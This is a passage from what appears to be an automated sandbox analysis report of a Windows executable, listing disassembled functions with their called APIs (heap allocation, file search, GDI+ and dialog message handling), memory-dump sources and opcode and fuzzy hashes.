                                                              • Instruction ID: 9e06c04b4a3f5cc9c5982eae9a25f7922f2e3d5b724e470aa1e582b1dddd04e9
                                                              • Opcode Fuzzy Hash: 9941ca52761c012df3ae81e7aa230c006c3b165b272bf8d08d9b5a87e42d0971
                                                              • Instruction Fuzzy Hash: 05418770A00B09CFDB20DFADDA81BA9B7F5BF45304F14442DE04A9B362D738A841DB22
                                                              Function 00992C30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00992C37
                                                                • Part of subcall function 009A880E: __EH_prolog3.LIBCMT ref: 009A8815
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_
                                                              • String ID:
                                                              • API String ID: 3355343447-0
                                                              • Opcode ID: 23a79b449bf2a1ff32e8d7621f43c1875a5c8f9b2046995e63334431f4c4e111
                                                              • Instruction ID: 666643030a026b0ee98f48b4ebe2313fcd70b015dc2c8b7f4a7efef73920d240
                                                              • Opcode Fuzzy Hash: 23a79b449bf2a1ff32e8d7621f43c1875a5c8f9b2046995e63334431f4c4e111
                                                              • Instruction Fuzzy Hash: C631497190120CBACF18EBE8D881AEEBBBDAF49300F14006AF441A3251DA349985CB60
                                                              Function 009A97A4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 16fcb08ced6baa444e67255ce88f4d5996332d6b9f3b10eefcf3b53cb456dd57
                                                              • Instruction ID: b443455858976b3a14691fbf1d80b23abab20f89cc3f39a93bd658cea6a7ce7d
                                                              • Opcode Fuzzy Hash: 16fcb08ced6baa444e67255ce88f4d5996332d6b9f3b10eefcf3b53cb456dd57
                                                              • Instruction Fuzzy Hash: 5A21D671E006169BEF18EF788D46B5E76A8BF85314F05023AE505AF2C1D7749D40C7E4
                                                              Function 0099D771 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 48ff1af3e8fb94897d60cb76018e792389593fd8e02a0f6c8034a8187c0a7a96
                                                              • Instruction ID: 5166cb3f280280ce9d4e8016f079a1c7d252ae3a45f36babf7fb67655eff67b3
                                                              • Opcode Fuzzy Hash: 48ff1af3e8fb94897d60cb76018e792389593fd8e02a0f6c8034a8187c0a7a96
                                                              • Instruction Fuzzy Hash: E4217CB6A0161A9BDF14DFEDC9C1BEEB7B9BFC8340F14401AE500A7201DB709E008BA5
                                                              Function 0099EAF3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2427045233-0
                                                              • Opcode ID: ef8e225282648697d3d1079c9f790865507227f259568ca3bd1060d59f3a6759
                                                              • Instruction ID: 587ed0def97c568a58262e3c5aa28d6a8264a87ddba8f5fce482657a0db0ff7b
                                                              • Opcode Fuzzy Hash: ef8e225282648697d3d1079c9f790865507227f259568ca3bd1060d59f3a6759
                                                              • Instruction Fuzzy Hash: 4921AC30601308AADF20EF6EC842FEEB3ADAF96750F140959F442A7581DA749A49C7A0
                                                              Function 009B437D Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2427045233-0
                                                              • Opcode ID: 776b08d5d8958ff11859d428cc198b51a31141b14e747e75b91f041b5d37d40f
                                                              • Instruction ID: 728dbbe2310abc168e539f3b68c9495eafb81fa7d2eeb1596a475dcf8c84ff7c
                                                              • Opcode Fuzzy Hash: 776b08d5d8958ff11859d428cc198b51a31141b14e747e75b91f041b5d37d40f
                                                              • Instruction Fuzzy Hash: E7213071900209DEDF04EFA8DA85BDD7BF9AF89310F140019F104E72A2DA359A45DB61
                                                              Function 009C3129 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009C1DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009C00BA,00000001,00000364,?,009B6C16,?,?,?,?,?,009B5269,009B535E), ref: 009C1E27
                                                              • _free.LIBCMT ref: 009C3195
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                              • Instruction ID: ff6a62c86de6a56fd4b4266d0926a9ff1798e8447967978e60ea6015708e4abf
                                                              • Opcode Fuzzy Hash: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                              • Instruction Fuzzy Hash: A0010472A043056BE3218E659845F5AFBDDEB86370F29462DE19483280EA30A905C765
                                                              Function 009B4300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2427045233-0
                                                              • Opcode ID: 66c9de26c69de623d3c7d7a58f9c1a26a4e3c36030590a2bc38162a34f0841c3
                                                              • Instruction ID: 8024b7bd3520e871f27817f0b0ddf6a3d2ef28c167c6268fcfe9c98f3b3c1d08
                                                              • Opcode Fuzzy Hash: 66c9de26c69de623d3c7d7a58f9c1a26a4e3c36030590a2bc38162a34f0841c3
                                                              • Instruction Fuzzy Hash: 36016DB1845209AEDF00EBE4CA86BDEB7B8BF54354F484065F500AA182CA789B49CB71
                                                              Function 009C1DE6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009C00BA,00000001,00000364,?,009B6C16,?,?,?,?,?,009B5269,009B535E), ref: 009C1E27
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 4cc7e4baf479266cd1808132e55f3bec858b2b65e5f349315b84cef564aab813
                                                              • Instruction ID: 66c732410e93b8985c5fe646c698e752e8316711d04a395ffb6f152d6c45e253
                                                              • Opcode Fuzzy Hash: 4cc7e4baf479266cd1808132e55f3bec858b2b65e5f349315b84cef564aab813
                                                              • Instruction Fuzzy Hash: A7F0BB31E0512466DB251B629C05F97774C9F86770B148069FC08DB192DA60DD0046EA
                                                              Function 009C040E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 2de3bab2a36c2b47574d875dc57b8263d11603b4ff38f1f616fdcaf7b4979cbd
                                                              • Instruction ID: 3d6fcb46e2d69af336c515be77bab46fc4e1b72d8f88e8e6befdfc614cf3e6a5
                                                              • Opcode Fuzzy Hash: 2de3bab2a36c2b47574d875dc57b8263d11603b4ff38f1f616fdcaf7b4979cbd
                                                              • Instruction Fuzzy Hash: E0E06532D09211D6EA2927A59C01F9B7A4C9FC53B0F194128EE5C961B2EB64CC0091A3
                                                              Function 0099F711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0099F826: __EH_prolog3_GS.LIBCMT ref: 0099F830
                                                                • Part of subcall function 0099F826: FindFirstFileW.KERNELBASE(?,?,00000274,0099F733,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?), ref: 0099F859
                                                                • Part of subcall function 0099F826: FindFirstFileW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F8A4
                                                                • Part of subcall function 0099F826: GetLastError.KERNEL32(?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049,?,00000000), ref: 0099F902
                                                              • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?,?,?,?), ref: 0099F739
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                              • String ID:
                                                              • API String ID: 765066492-0
                                                              • Opcode ID: 5391add7b7e79233dea1e48e49ce751d16c41f06a5acd290b29a05b3d84b948e
                                                              • Instruction ID: e90177297ff84329c3481060a6dd2577190afe95c086899f0394c493585b5423
                                                              • Opcode Fuzzy Hash: 5391add7b7e79233dea1e48e49ce751d16c41f06a5acd290b29a05b3d84b948e
                                                              • Instruction Fuzzy Hash: C4F0A03140D790AECE21ABAC8804B8BBFE46F5B374F004B09F0FD525A2C231A0549B22
                                                              Function 009A73F8 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 009A742D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: c923bf7e1e2596ce548df186cd4e6d819c1f72bee641eb6282b20f4cbfb93462
                                                              • Instruction ID: 939325f268b80dfe0d456c88d8ef84a5823c8796b9da97f062b4136a7579819b
                                                              • Opcode Fuzzy Hash: c923bf7e1e2596ce548df186cd4e6d819c1f72bee641eb6282b20f4cbfb93462
                                                              • Instruction Fuzzy Hash: ECD05B21B5D15026FE25776D6D467FE1E4B4FC7315F09007AF04557193CE940886D3E6
                                                              Function 009911DD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00991206
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_task
                                                              • String ID:
                                                              • API String ID: 118556049-0
                                                              • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                              • Instruction ID: a50debd413a64d124e90834f78309736136d0f686fa78b42e06ae1e683ae3ddf
                                                              • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                              • Instruction Fuzzy Hash: 6FD05E766026034E8B2DFB38C666A6E77946EA0315351462DF03BCA691DF21CC15C615
                                                              Function 009AEB06 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 009AEB0C
                                                                • Part of subcall function 009AE849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009AE86A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                              • Instruction ID: 17672c572012eb8babd2d9d26d306b9a193dcda607435d15a2962baf5f1a69ed
                                                              • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                              • Instruction Fuzzy Hash: 57D0A930200209BADF822B229C02ABE7A98EF42350F008421B80285190EAB1EA10A2E0
                                                              Function 009B4231 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 009B4256
                                                                • Part of subcall function 009B0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B0689
                                                                • Part of subcall function 009B0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B069A
                                                                • Part of subcall function 009B0678: IsDialogMessageW.USER32(000103EA,?), ref: 009B06AE
                                                                • Part of subcall function 009B0678: TranslateMessage.USER32(?), ref: 009B06BC
                                                                • Part of subcall function 009B0678: DispatchMessageW.USER32(?), ref: 009B06C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 97b2bf5b95ef4fd549e3d5e5bbaf8792214457d8004f3f89338ba2acd9164dcb
                                                              • Instruction ID: 3158dfb38699325bfdab79f5a2faf97f82b8fd965f816568860da3c90a95110b
                                                              • Opcode Fuzzy Hash: 97b2bf5b95ef4fd549e3d5e5bbaf8792214457d8004f3f89338ba2acd9164dcb
                                                              • Instruction Fuzzy Hash: 86D09E31158200AAD6122B52CE06F0A7AE2EBC8B15F004654B745740B1C6629E31AB12
                                                              Function 009B4D2C Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009B4DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 009B4DF2
                                                              • DloadProtectSection.DELAYIMP ref: 009B4D54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AcquireDloadExclusiveLockProtectSection
                                                              • String ID:
                                                              • API String ID: 3680172570-0
                                                              • Opcode ID: 954f66e63e104733c8999dafa7707408a3407a50a80b495dc5ec7f120a149eaf
                                                              • Instruction ID: a3adea924c498c164b65c487b685a036681c11b959c9b16a302e2d44d48722eb
                                                              • Opcode Fuzzy Hash: 954f66e63e104733c8999dafa7707408a3407a50a80b495dc5ec7f120a149eaf
                                                              • Instruction Fuzzy Hash: 8FD012395585A4BED712AB249E8A7D422A4B3C433CF810505F2528A1E7CF746890B601
                                                              Function 0099E152 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,0099E052,?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E15E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: de3f525a136670102c9fbebcc2ba60c80fdb9c59be175bcbd4b6903b82042d04
                                                              • Instruction ID: fdc6c6852740e56113ec44c4acf5ce858e6ab29f120e9836f8f263da184fb27b
                                                              • Opcode Fuzzy Hash: de3f525a136670102c9fbebcc2ba60c80fdb9c59be175bcbd4b6903b82042d04
                                                              • Instruction Fuzzy Hash: 5FC00234808209D68E318A2C98494997626AA527A67B89795D02D995A1C7328C97EA11
                                                              Function 009B4999 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2fe3fc8d27646dbb3ac61b4573d76704118d6b0418ac474f8854d54339d45405
                                                              • Instruction ID: 4f26066799ffc170de5d07e060da393380f14803885ad556850c29bf01b34579
                                                              • Opcode Fuzzy Hash: 2fe3fc8d27646dbb3ac61b4573d76704118d6b0418ac474f8854d54339d45405
